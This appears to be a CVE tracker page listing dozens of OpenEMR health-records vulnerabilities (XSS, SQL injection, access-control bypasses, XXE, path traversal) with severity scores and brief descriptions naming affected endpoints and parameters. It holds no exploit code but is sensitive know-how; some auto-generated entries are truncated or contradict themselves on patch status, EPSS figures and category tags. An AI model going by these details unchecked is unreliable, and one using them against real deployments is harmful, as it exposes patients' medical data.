Openemr

78 CVEs product

Monthly

CVE-2026-46518 HIGH This Week

Stored cross-site scripting in OpenEMR before 8.0.0.1 lets an authenticated patient portal user inject HTML/JavaScript into demographic fields via the PUT api/patient/:num endpoint, which fires later in a clinician's authenticated session when the prescription CSS/HTML multi-print feature renders the patient name and address without output encoding. Because the payload executes inside the main OpenEMR UI under the clinician's session, the attacker crosses the patient-to-clinician trust boundary and can steal CSRF tokens, exfiltrate session data, and perform privileged actions as the clinician. SSVC currently rates exploitation as POC, no public exploit identified at time of analysis, and EPSS is 0.03% (9th percentile), but the cross-tenant trust crossing in a healthcare app makes the issue material for any internet-exposed deployment.

CSRF XSS Openemr
NVD GitHub VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-34051 MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 contain an improper access control vulnerability in the Import/Export functionality that allows authenticated users to bypass UI restrictions and perform unauthorized import and export operations through direct request manipulation. An attacker with valid credentials can extract bulk patient data, access sensitive health records, or modify system data despite not having explicit permissions for these actions. The vulnerability requires valid authentication (PR:L in CVSS) but enables significant data exfiltration and integrity violations once access is obtained.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33933 MEDIUM This Month

A reflected cross-site scripting (XSS) vulnerability exists in the custom template editor of OpenEMR, a widely-deployed open-source electronic health records system. Attackers can craft malicious URLs that, when clicked by authenticated staff members, execute arbitrary JavaScript within their browser sessions and gain access to sensitive medical data and system functions; notably, the attacker does not require an OpenEMR account themselves. The vulnerability affects OpenEMR versions 7.0.2.1 through 8.0.0.2, and while there is no evidence of active exploitation in the wild or public proof-of-concept code, the moderate CVSS score of 6.1 combined with the user-interaction requirement and the context-sensitive nature of healthcare data makes this a meaningful priority for healthcare organizations.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-33932 HIGH This Week

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's CCDA document preview functionality that allows authenticated attackers to execute arbitrary JavaScript in clinician browser sessions. OpenEMR versions prior to 8.0.0.3 are affected. The vulnerability occurs because the XSL stylesheet fails to sanitize linkHtml attributes in CCDA documents, allowing javascript: URLs and event handlers to execute when documents are previewed.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-34056 HIGH This Week

Low-privilege authenticated users in OpenEMR versions up to and including 8.0.0.3 can view and download Ensora eRx error logs due to missing authorization checks, exposing sensitive healthcare system information. This broken access control vulnerability (CVSS 7.7) affects network-accessible installations and has a 3% EPSS exploitation probability (8th percentile), with no public exploit identified at time of analysis. No vendor-released patch identified at time of analysis according to the CVE disclosure.

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-33931 MEDIUM This Month

OpenEMR portal payment pages prior to version 8.0.0.3 expose other patients' protected health information (PHI) and payment card metadata through an Insecure Direct Object Reference vulnerability. Authenticated portal patients can manipulate the `recid` query parameter in `portal/portal_payment.php` to access arbitrary patient payment records and billing data without authorization. The vulnerability affects all versions before 8.0.0.3 and carries a CVSS score of 6.5 (high confidentiality impact); however, the 0.03% EPSS score indicates low real-world exploitation probability, and no public exploit code or active exploitation has been identified.

Openemr PHP Information Disclosure
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-33918 HIGH This Week

Improper access control in OpenEMR versions prior to 8.0.0.3 allows any authenticated user to download and permanently delete electronic claim batch files containing protected health information (PHI) via the billing file-download endpoint, regardless of whether they have billing privileges. The vulnerability has a 7.6 CVSS score with low attack complexity and requires only low-level authentication. EPSS exploitation probability is 0.03% (8th percentile), indicating low observed targeting in real-world exploitation at time of analysis, and no public exploit has been identified.

Openemr PHP Privilege Escalation Information Disclosure
NVD GitHub VulDB
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-33917 HIGH This Week

SQL injection in OpenEMR versions prior to 8.0.0.3 enables authenticated attackers to execute arbitrary SQL commands through the CAMOS form's ajax_save functionality, potentially leading to complete database compromise including extraction of sensitive health records, data modification, and service disruption. The vulnerability requires low-privilege authentication (PR:L) with no user interaction (UI:N) and is network-exploitable (AV:N), though EPSS assigns only 0.03% (8th percentile) exploitation probability and no public exploit identified at time of analysis. Vendor-released patch available in version 8.0.0.3.

Openemr SQLi PHP
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-33915 MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 allow authenticated API users to bypass administrative access controls on five insurance company management REST API endpoints due to missing authorization checks. An attacker with valid API credentials but non-administrative OpenEMR privileges can create, read, and modify insurance company records without proper permission validation. The vulnerability requires prior authentication and affects data integrity rather than confidentiality or availability; no public exploit code has been identified, and exploitation probability is very low (EPSS 0.02%).

Openemr Privilege Escalation Authentication Bypass
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33914 HIGH This Week

A blind SQL injection vulnerability exists in the PostCalendar module of OpenEMR, a widely-used open source electronic health records system. Versions prior to 8.0.0.3 are affected, allowing authenticated administrators to execute arbitrary SQL commands through the categoriesUpdate function's dels parameter. The vulnerability requires high privileges (PR:H) but is network-accessible with low attack complexity, enabling attackers to extract sensitive patient data, modify health records, or disrupt medical operations.

SQLi Openemr
NVD GitHub VulDB
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-33913 HIGH This Week

OpenEMR versions prior to 8.0.0.3 contain an XML External Entity (XXE) injection vulnerability in the Carecoordination module that allows authenticated users to read arbitrary files from the server. Attackers can exploit this by uploading a maliciously crafted CCDA document containing XXE payloads to access sensitive server files such as /etc/passwd. A patch is available in version 8.0.0.3, and this vulnerability has a CVSS score of 7.7 with high confidentiality impact.

XXE Openemr
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-33912 MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 contain a stored cross-site scripting (XSS) vulnerability in form handling that allows authenticated attackers to inject malicious JavaScript into forms, which executes in the browser sessions of victims who submit those forms. An attacker with valid OpenEMR credentials can craft a malicious form that, upon submission by any user, executes arbitrary JavaScript with the privileges of the victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. The vulnerability is low-to-moderate severity (CVSS 5.4) due to the requirement for authentication and user interaction, but it poses significant risk in healthcare environments where attackers may have legitimate credentials and victims include healthcare providers with broad system access.

XSS Openemr
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33911 MEDIUM This Month

This is a stored/reflected cross-site scripting (XSS) vulnerability in OpenEMR versions prior to 8.0.0.3 where the POST parameter 'title' is improperly encoded in JSON responses but served with a text/html Content-Type header, causing browsers to execute injected JavaScript rather than treat the output as data. An authenticated attacker can craft a malicious request to execute arbitrary JavaScript in a victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. The vulnerability carries a moderate CVSS score of 5.4 but requires authentication and user interaction (UI:R), reducing immediate exploitation likelihood, though a proof-of-concept fix commit is available in the GitHub repository.

XSS Openemr
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33910 HIGH This Week

OpenEMR versions up to and including 8.0.0.2 contain a SQL injection vulnerability in the patient selection feature that allows authenticated attackers with high privileges to execute arbitrary SQL commands. The vulnerability stems from insufficient input validation and can lead to complete compromise of confidentiality, integrity, and availability of the healthcare database. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept is currently available.

SQLi Openemr
NVD GitHub
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-33909 MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 contain a SQL injection vulnerability in the MedEx recall/reminder processing code where user-controlled variables are concatenated directly into SQL queries without parameterization or type casting. An authenticated attacker with high privileges can exploit this to extract, modify, or delete sensitive healthcare data from the database. The CVSS score of 5.9 is moderate because the attack requires a high privilege level (PR:H) and high attack complexity (AC:H), but the confidentiality and integrity impacts are severe given the medical context.

SQLi Openemr
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-33348 HIGH This Week

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's Eye Exam form functionality that allows authenticated users with the 'Notes - my encounters' role to inject malicious JavaScript payloads through form answers. OpenEMR versions prior to 8.0.0.3 are affected. Attackers can execute arbitrary JavaScript in the browsers of other authenticated users when they view the compromised encounter pages or visit history, potentially leading to session hijacking, credential theft, or unauthorized actions within the EHR system.

XSS Openemr
NVD GitHub
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-33305 MEDIUM PATCH This Month

A remote code execution vulnerability in OpenEMR (CVSS 5.4) that allows any authenticated openemr user. Remediation should follow standard vulnerability management procedures.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33304 MEDIUM PATCH This Month

An authorization bypass vulnerability in OpenEMR versions prior to 8.0.0.2 allows authenticated non-administrator users to access reminder messages and associated patient information belonging to other users by manipulating GET request parameters. Any authenticated user can view sensitive data including patient names and message content from arbitrary user accounts without proper authorization checks. This vulnerability has a CVSS score of 6.5 (Medium) with high confidentiality impact but no integrity or availability impact, and a proof-of-concept has been published via the GitHub security advisory.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-33303 MEDIUM PATCH This Month

Stored XSS in OpenEMR versions before 8.0.0.2 allows authenticated patient portal users to inject malicious scripts into their login username, which execute in the browsers of clinic staff when viewing the portal credential creation page. This vulnerability enables attackers to compromise staff and admin sessions through the patient context, potentially leading to unauthorized access or data manipulation within the healthcare system. A patch is available in version 8.0.0.2 and later.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33302 HIGH PATCH This Week

A remote code execution vulnerability in OpenEMR (CVSS 8.1). High severity vulnerability requiring prompt remediation.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-33321 HIGH PATCH This Week

OpenEMR versions prior to 8.0.0.2 allow authenticated users with the Notes role to trigger an out-of-band Server-Side Request Forgery (SSRF) vulnerability through unescaped HTML parsing in Eye Exam form PDF generation, enabling attackers to forge requests to arbitrary internal or external resources from the affected server. This vulnerability requires valid user credentials but no user interaction, and can lead to information disclosure or further internal network compromise. No patch is currently available for affected deployments.

SSRF Openemr
NVD GitHub VulDB
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-33301 HIGH PATCH This Week

A remote code execution vulnerability in OpenEMR (CVSS 8.1). High severity vulnerability requiring prompt remediation.

Information Disclosure Openemr
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-33299 MEDIUM PATCH This Month

Stored XSS in OpenEMR prior to 8.0.0.2 allows authenticated users with the "Notes - my encounters" role to inject malicious JavaScript into Eye Exam form fields, which executes when other users with the same role view the form responses. An attacker can exploit this to steal session tokens, perform unauthorized actions, or compromise patient data through form manipulation. No patch is currently available for affected versions.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-32119 MEDIUM PATCH This Month

DOM-based stored XSS in OpenEMR's SearchHighlight plugin (versions prior to 8.0.0.2) enables authenticated users with encounter form write access to inject malicious JavaScript that executes in other clinicians' browsers during report searches. An attacker can leverage this to steal session tokens, modify patient data, or perform actions on behalf of targeted medical staff. The vulnerability stems from improper handling of HTML entity decoding when parsing search results.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-32238 CRITICAL PATCH Act Now

Command injection in OpenEMR's backup functionality (versions prior to 8.0.0.2) allows authenticated high-privilege users to execute arbitrary commands on the underlying system due to insufficient input validation. The CVSS 9.1 critical rating reflects the potential for complete system compromise, though exploitation requires valid administrative credentials. No patch is currently available for affected versions.

Command Injection Openemr
NVD GitHub VulDB
CVSS 3.1
9.1
EPSS
0.2%
CVE-2026-25744 MEDIUM PATCH This Month

OpenEMR versions prior to 8.0.0.2 contain an authorization bypass vulnerability in the encounter vitals API that allows authenticated users with encounters/notes permissions to overwrite any patient's vital signs by supplying another patient's vital ID in the request body. This constitutes medical record tampering with integrity implications rated CVSS 6.5. No evidence of active exploitation in KEV or public POC availability was identified in the provided intelligence, though the vulnerability is straightforward to exploit given valid API credentials.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-25745 MEDIUM This Month

OpenEMR versions up to 8.0.0 contain an authorization bypass vulnerability in the message/note update endpoints that allows authenticated users with notes permissions to modify any patient's messages without proper access control verification. An attacker can exploit this by supplying arbitrary message IDs in PUT or POST requests, enabling unauthorized modification of other patients' medical records. This is a moderate-risk issue (CVSS 6.5) with integrity impact on sensitive healthcare data, though exploitation requires existing authentication and notes permissions.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-32127 HIGH This Week

OpenEMR versions prior to 8.0.0.1 contain a SQL injection vulnerability in the ajax graphs library that allows authenticated users to execute arbitrary database queries, potentially leading to complete compromise of patient health records and system data. The vulnerability stems from insufficient input validation and requires valid credentials to exploit, but poses a critical risk given the sensitive nature of healthcare data stored in OpenEMR systems. No patch is currently available for affected versions.

SQLi Openemr
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-32126 HIGH This Week

OpenEMR versions prior to 8.0.0.1 contain an inverted boolean condition in the access control logic that allows any authenticated user to access administrative CDR controllers (alerts, ajax, edit, add, detail, browse) intended for administrators only. Affected users can suppress clinical decision support alerts, delete or modify clinical plans, and edit rule configurations without proper authorization. No patch is currently available for this high-severity vulnerability.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-32125 MEDIUM This Month

Stored cross-site scripting in OpenEMR versions prior to 8.0.0.1 allows authenticated users with Track Anything feature access to inject malicious scripts into item names that execute in the browsers of all users viewing the corresponding Dygraph charts. An attacker with create or edit permissions can craft payloads that run in victims' sessions without their knowledge, potentially enabling session hijacking or unauthorized actions within the application. No patch is currently available for affected versions.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-32124 MEDIUM This Month

Stored cross-site scripting (XSS) in OpenEMR prior to 8.0.0.1 allows administrators or users with code management privileges to inject malicious scripts into code descriptions that execute in the browsers of all users accessing the dynamic code picker. All OpenEMR instances running affected versions are at risk, as any authenticated admin can inject payloads affecting the entire user base. No patch is currently available for this vulnerability.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-32123 HIGH This Week

OpenEMR versions prior to 8.0.0.1 fail to properly enforce access controls on group encounters because the sensitivity checks query the wrong database table, allowing authenticated users to view restricted medical records, such as mental health encounters, that they should not be able to access. The vulnerability affects multi-user deployments where role-based restrictions are relied upon to protect sensitive patient information. No patch is currently available for affected versions.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-32122 MEDIUM This Month

OpenEMR versions prior to 8.0.0.1 fail to properly enforce access controls on the Claim File Tracker AJAX endpoint, allowing authenticated users without billing permissions to retrieve sensitive claim metadata including claim IDs, payer information, and transmission logs. An authenticated attacker with minimal privileges can access confidential billing information that should be restricted to authorized billing staff. No patch is currently available for affected installations.

Authentication Bypass Openemr
NVD GitHub VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-32121 HIGH This Week

Stored DOM-based cross-site scripting (XSS) in OpenEMR prior to version 8.0.0.1 allows authenticated attackers with low privileges to inject malicious scripts through unsanitized patient names in the portal signing component, which are rendered client-side via jQuery. Successful exploitation requires user interaction and could enable attackers to perform actions in the context of affected users or steal sensitive health information. A patch is available in OpenEMR 8.0.0.1 and later versions.

PHP XSS Openemr
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-32118 MEDIUM This Month

Stored XSS in OpenEMR's Pain Map form prior to version 8.0.0.1 allows authenticated users to inject malicious JavaScript into encounter records that executes when other clinicians view the affected form. Since session cookies lack HttpOnly protection, attackers can hijack sessions of other users including administrators. This vulnerability requires user interaction and network access but poses significant risk in multi-user healthcare environments.

XSS Openemr
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-25146 CRITICAL POC PATCH Act Now

Information disclosure in OpenEMR versions from 5.0.2 up to, but not including, 8.0.0 exposes sensitive data. PoC and patch available.

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-24898 CRITICAL POC PATCH Act Now

Unauthenticated token disclosure in OpenEMR before 8.0.0. CVSS 10.0. PoC and patch available.

Authentication Bypass Information Disclosure PHP Openemr
NVD GitHub
CVSS 3.1
10.0
EPSS
0.2%
CVE-2026-24848 CRITICAL POC Act Now

Path traversal in OpenEMR 7.0.4 disposeDocument() allows file access. PoC available.

PHP RCE Openemr
NVD GitHub
CVSS 3.1
9.9
EPSS
0.2%
CVE-2026-25147 HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 allow authenticated portal users to access other patients' protected health information through insecure direct object references (IDOR) in the payment portal, enabling horizontal privilege escalation to view and modify another patient's demographics, invoices, and payment history. The vulnerability stems from accepting patient ID values from user-controlled request parameters instead of validating against the authenticated user's session. Public exploit code exists for this vulnerability.

PHP Privilege Escalation Openemr
NVD GitHub
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-24488 MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 contain a path traversal vulnerability in the fax sending functionality that allows authenticated users to exfiltrate arbitrary files from the server, including database credentials, patient records, and source code. The fax endpoint fails to validate or restrict file paths, enabling attackers to read and transmit sensitive data to attacker-controlled phone numbers. Public exploit code exists for this vulnerability, and a patch is available.

Path Traversal Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-27943 MEDIUM POC PATCH This Month

Authenticated users in OpenEMR through version 8.0.0 can access and modify eye exam records belonging to other patients by manipulating form IDs, bypassing patient context validation. This allows disclosure or alteration of sensitive medical data across the patient database, and public exploit code exists for this vulnerability. A patch is available on the main branch of the OpenEMR repository.

Github Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-25930 MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 are affected by an authorization bypass through a user-controlled key (CVSS 6.5).

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-25929 MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 are affected by an authorization bypass through a user-controlled key (CVSS 6.5).

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-25927 HIGH POC This Week

OpenEMR versions up to 8.0.0 are affected by an authorization bypass through a user-controlled key (CVSS 7.1).

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-25746 HIGH POC PATCH This Week

SQL injection in OpenEMR versions before 8.0.0 allows authenticated users to execute arbitrary database queries through the prescription listing feature due to improper input validation. An attacker with valid credentials could exploit this to read, modify, or delete sensitive medical records and patient data. Public exploit code exists for this vulnerability; administrators should upgrade to version 8.0.0 immediately.

SQLi Openemr
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-25743 MEDIUM POC PATCH This Month

Stored XSS in OpenEMR prior to version 8.0.0 allows authenticated users with "Forms administration" role to inject malicious JavaScript into patient encounter forms, which executes when other users with the same role view the affected data. Public exploit code exists for this vulnerability. The issue is resolved in version 8.0.0.

XSS Openemr
NVD GitHub
CVSS 3.1
4.8
EPSS
0.3%
CVE-2026-25476 HIGH POC PATCH This Week

OpenEMR prior to version 8.0.0 fails to enforce session expiration when the skip_timeout_reset parameter is present in requests, allowing expired sessions to remain active indefinitely. An attacker with a stolen session cookie can exploit this by continuously sending the skip_timeout_reset parameter to maintain unauthorized access to sensitive health records without being logged out. Public exploit code exists for this vulnerability with a CVSS score of 7.5.

PHP Openemr
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-25220 MEDIUM POC PATCH This Month

OpenEMR versions prior to 8.0.0 allow any authenticated user to view all internal messages and notes from other users by exploiting insufficient authorization checks on the Message Center's `show_all` parameter. The vulnerability exists because the application does not verify administrator privileges before returning the complete message list, enabling unauthorized disclosure of sensitive medical communications. Public exploit code exists for this medium-severity information disclosure vulnerability.

PHP Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-25164 HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 fail to enforce API authorization checks on document and insurance endpoints, allowing any authenticated API client to read and modify all patient PHI regardless of assigned access controls. Public exploit code exists for this vulnerability, which affects healthcare organizations using OpenEMR's REST API. An attacker with valid API credentials can access sensitive medical records and insurance information across the entire patient database.

PHP Openemr
NVD GitHub
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-24908 CRITICAL POC PATCH Act Now

SQL injection in OpenEMR electronic health records before fix. Authenticated users can execute arbitrary SQL through the medical records system. PoC and patch available.

SQLi Openemr
NVD GitHub
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-24890 HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 contain an authorization bypass in the patient portal that allows authenticated users to forge provider signatures by uploading files with admin-signature type parameters for any provider. Public exploit code exists for this vulnerability, which could enable signature forgery on medical documents, creating legal and compliance risks. Upgrade to version 8.0.0 or later to remediate this high-severity flaw.

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-24487 MEDIUM POC PATCH This Month

OpenEMR versions prior to 8.0.0 contain an authorization bypass in the FHIR CareTeam endpoint that allows authenticated users with patient-scoped tokens to retrieve care team information for all patients rather than only their own, potentially exposing Protected Health Information across the entire system. The vulnerability exists because the service fails to enforce patient compartment filtering, and public exploit code is available. Security professionals should prioritize patching to version 8.0.0 or later to prevent unauthorized PHI disclosure.

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-23627 HIGH POC PATCH This Week

SQL injection in OpenEMR's Immunization module prior to version 8.0.0 enables authenticated users to execute arbitrary database queries through unparameterized patient_id inputs. This allows attackers to exfiltrate protected health information, steal credentials, and potentially achieve remote code execution with complete database compromise. Public exploit code exists for this vulnerability; organizations should upgrade to version 8.0.0 immediately.

RCE SQLi Openemr
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-25135 MEDIUM PATCH This Month

OpenEMR versions prior to 8.0.0 expose complete contact details for all users, organizations, and patients to authenticated attackers with specific FHIR export and location read permissions. The vulnerability requires administrator-enabled OAuth2 confidential client access, limiting exploitation to high-trust server-to-server integrations with established relationships. This information disclosure affects OpenEMR deployments since 2023 and can be mitigated by upgrading to version 8.0.0 or later.

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
4.5
EPSS
0.1%
CVE-2026-25131 HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 contain a broken access control flaw in the order types management system that allows low-privilege users (such as receptionists) to create and modify procedure types without proper authorization. Public exploit code exists for this vulnerability, which has a CVSS score of 8.8 and could enable unauthorized users to manipulate critical medical procedure data. The vulnerability has been patched in version 8.0.0 and later.

PHP Openemr
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-25127 MEDIUM POC PATCH This Month

OpenEMR versions prior to 8.0.0 fail to properly enforce permission checks, allowing authenticated users to access sensitive information belonging to other authorized users. The vulnerability requires valid credentials and network access but does not enable data modification or denial of service. Public exploit code exists and a patch is available in version 8.0.0 and later.

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-25124 MEDIUM POC PATCH This Month

OpenEMR prior to version 8.0.0 allows low-privileged users to export sensitive patient and medical data through the message_list.php report functionality due to missing access controls. The vulnerability affects receptionists and similar roles who can bypass authorization checks to extract entire message databases containing confidential information. Public exploit code exists for this issue, though a patch is available in version 8.0.0 and later.

PHP CSRF Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-24896 MEDIUM POC PATCH This Month

OpenEMR versions before 8.0.0 contain an improper access control flaw in the edih_main.php endpoint that allows any authenticated user, including low-privilege accounts like Receptionists, to retrieve sensitive EDI log files by manipulating the log_select parameter. The vulnerability bypasses role-based access controls that should restrict access through the GUI, enabling unauthorized disclosure of system logs. Public exploit code exists for this issue, which is fixed in version 8.0.0.

PHP Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-24849 CRITICAL POC PATCH Act Now

Path traversal in OpenEMR (electronic health records), in versions before the fix, allows authenticated users to read arbitrary files on the server, potentially exposing patient health data. PoC and patch available.

PHP Openemr
NVD GitHub Exploit-DB VulDB
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-24847 MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 are affected by URL redirection to an untrusted site (open redirect) (CVSS 6.1).

Open Redirect Openemr
NVD GitHub
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-21443 MEDIUM PATCH This Month

Cross-site scripting (XSS) in OpenEMR prior to version 8.0.0 allows an attacker who can write to the translation database, without holding an OpenEMR login, to inject malicious scripts: the `xl()` function returns unescaped strings, and callers use them directly without the context-specific escaping (HTML body, attribute, or JavaScript string) that each output position needs. An attacker with that database access could execute arbitrary JavaScript in users' browsers and compromise sensitive patient data or application functionality. The vulnerability is resolved in OpenEMR 8.0.0 and later versions.

XSS Openemr
NVD GitHub
CVSS 3.1
6.1
EPSS
0.1%
CVE-2025-69231 HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. [CVSS 8.7 HIGH]

XSS Privilege Escalation Openemr
NVD GitHub
CVSS 3.1
8.7
EPSS
0.2%
CVE-2025-68277 MEDIUM POC PATCH This Month

OpenEMR versions up to 7.0.4 are affected by user interface (UI) misrepresentation of critical information (CVSS 5.0).

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
5.0
EPSS
0.0%
CVE-2025-67752 HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. [CVSS 8.1 HIGH]

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2025-67491 MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Versions 5.0.0.5 through 7.0.3.4 have a stored cross-site scripting vulnerability in the ub04 helper of the billing interface. [CVSS 5.4 MEDIUM]

XSS Openemr
NVD GitHub
CVSS 3.1
5.4
EPSS
0.2%
CVE-2025-67645 HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. [CVSS 8.8 HIGH]

Authentication Bypass Openemr
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2025-54373 MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a vulnerability where sensitive data is unintentionally revealed to unauthorized parties. [CVSS 6.5 MEDIUM]

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2021-47817 MEDIUM POC This Month

OpenEMR 5.0.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript through user profile parameters. [CVSS 5.4 MEDIUM]

XSS Openemr
NVD Exploit-DB VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2025-43860 HIGH POC This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
CVSS 3.1
7.6
EPSS
0.9%
CVE-2025-32967 MEDIUM POC This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

Information Disclosure Openemr
NVD GitHub
CVSS 3.1
5.4
EPSS
0.7%
CVE-2025-32794 HIGH POC This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
CVSS 3.1
7.6
EPSS
0.7%
CVE-2024-22611 CRITICAL POC Act Now

OpenEMR 7.0.2 is vulnerable to SQL Injection via \openemr\library\classes\Pharmacy.class.php, \controllers\C_Pharmacy.class.php and \openemr\controller.php. Rated critical severity (CVSS 9.8), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available and no vendor patch is available.

PHP SQLi Openemr
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2025-31121 HIGH POC This Week

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.0), this vulnerability is remotely exploitable. Public exploit code available and no vendor patch available.

XSS Openemr
NVD GitHub
CVSS 4.0
7.0
EPSS
1.2%
CVE-2025-31117 MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.

SSRF Openemr
NVD GitHub
CVSS 4.0
6.9
EPSS
1.0%
CVE-2025-30161 HIGH POC This Week

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 8.4), this vulnerability is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
CVSS 4.0
8.4
EPSS
0.5%
CVE-2025-30149 MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 6.4), this vulnerability is remotely exploitable. Public exploit code available.

PHP XSS Openemr
NVD GitHub
